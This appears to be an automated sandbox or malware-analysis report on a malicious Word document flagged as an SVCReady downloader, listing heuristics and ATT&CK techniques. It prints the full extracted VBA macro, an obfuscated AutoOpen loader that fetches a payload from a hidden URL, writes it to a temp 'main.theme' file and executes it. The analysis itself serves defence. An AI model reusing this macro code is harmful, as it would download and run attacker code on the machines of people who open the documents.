Verdict: MALICIOUS
Risk Score: 210
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a VBA macro with an AutoOpen subroutine, a common technique for executing malicious code as soon as the document is opened. The script constructs a temporary file path, "C:\Users\Public\main.theme" or "C:\Windows\Temp\main.theme", and uses the Shell execute function to run it, indicating that it is designed to download and execute a second-stage payload. The 'Doc.Downloader.SVCReady' ClamAV detection further supports this analysis.
Heuristics (7)
- ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
- External relationship [high, OOXML_EXTERNAL_REL]: External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
- VBA project inside OOXML [medium, OOXML_VBA, 3 related findings]: Document contains a VBA project — VBA macros present
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]: Environ() call (env variable access)
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2014/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (OOXML external relationship)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2016/ink (OOXML external relationship)
  - http://schemas.microsoft.com/office/drawing/2017/model3d (OOXML external relationship)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML external relationship)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (OOXML external relationship)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML external relationship)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2012/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2018/wordml/cex (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2016/wordml/cid (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2018/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2015/wordml/symex (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2006/wordml (OOXML external relationship)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (OOXML external relationship)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3950 bytes | 09cb568765d30c43241822b5e45da529a65c91ca0e3a16c9144c4c7d4851773d |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "c271b6e6"
Function c4417564()
c4417564 = ActiveWindow.StyleAreaWidth
End Function
Function dd4d52ad()
dd4d52ad = ActiveWindow.DisplayRulers
End Function
Function ed2091c4()
ed2091c4 = ActiveWindow.WindowState
End Function
Sub AutoOpen()
Dim f1a0f3ff As New d4a71a51
aaa = b943a190(a2069450)
a3931461 = f1a0f3ff.e1f7776c(aaa, "")
e3fd31f7 c63bf810, a3931461
b6d24304 = b943a190(ActiveDocument.Shapes(1).Title)
Dim cae04641 As New WshShell
cae04641.exec "" & b6d24304 & " " & c63bf810
End Sub
Attribute VB_Name = "ba732b87"
Function f61e351c()
f61e351c = ActiveWindow.Width
End Function
Function e1533a26()
e1533a26 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function f954ca51()
f954ca51 = 21595.857320986
End Function
Sub e3fd31f7(d1e0872f, e8e9e60c)
Dim c382cced
c382cced = FreeFile
Open d1e0872f For Output As #c382cced
Print #c382cced, b91ce79a(e8e9e60c)
Close #c382cced
End Sub
Function c63bf810()
c63bf810 = Environ("tmp") & "\main.theme"
End Function
Function b92a0802()
b92a0802 = ActiveWindow.UsableHeight
End Function
Function f03cee5d()
f03cee5d = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function bfac58a3()
bfac58a3 = ActiveWindow.DisplayLeftScrollBar
End Function
Function b943a190(e96d606d)
For e56921c0 = 1 To Len(e96d606d) Step 3
e4edf74b = Mid(e96d606d, e56921c0, 1)
dda39da1 = dda39da1 & e4edf74b
Next
b943a190 = dda39da1
End Function
Function aa219a7b(ad2ac5c3np As String) As Boolean
If 265 = Len(ad2ac5c3np) Then
aa219a7b = False
End If
End Function
Function a1da6ad3(d2d60111np As String) As Boolean
If 17208 / 36 > Len(d2d60111np) Then
a1da6ad3 = True
End If
End Function
Function bdfd8b04()
bdfd8b04 = 29131 * 1
End Function
Sub c23af6d7()
End Sub
Function b0df32bf()
b0df32bf = ActiveWindow.StyleAreaWidth
End Function
Function ef498d1b()
ef498d1b = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function d4d3fb24()
d4d3fb24 = ActiveWindow.Selection
End Function
Function b91ce79a(e8e9e60c)
b91ce79a = StrConv(e8e9e60c, 64)
End Function
Function d2304799()
d2304799 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function bc8c4ade()
bc8c4ade = ActiveWindow.Selection
End Function
Function dd4a322c()
dd4a322c = True
End Function
Function a2069450()
a2069450 = ActiveDocument.Shapes(1).AlternativeText
End Function
Attribute VB_Name = "d4a71a51"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function a20046f4(ab11ba6e As Long) As Long
Dim a6641164 As Long
For a6641164 = 36 To 51
ab11ba6e = ab11ba6e - a6641164
Next a6641164
a20046f4 = ab11ba6e
End Function
Function df157286() As Long
Dim b6f8e427 As Integer
Dim ddaf26dd As Integer
ddaf26dd = 187
For b6f8e427 = 8 To 65
ddaf26dd = ddaf26dd - b6f8e427
Next b6f8e427
df157286 = ddaf26dd
End Function
Function cdb3f6a1()
cdb3f6a1 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function e1f7776c(bc274be4, d9fbeca7)
Dim f45406f1 As Object
Set f45406f1 = New MSXML2.XMLHTTP60
Call f45406f1.Open("GET", bc274be4, False)
f45406f1.Send
e1f7776c = f45406f1.responsebody
End Function
Function fce5dd96()
fce5dd96 = ActiveWindow.UsableHeight
End Function
Function ce3248ee()
ce3248ee = False
End Function
Function bf3c1298()
bf3c1298 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function ea0f4e62(e7f0e1b9)
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 26112 bytes | a2e13d5290176254b42b0c8665eee10aafa88b0eafa84539f807480141debab4 |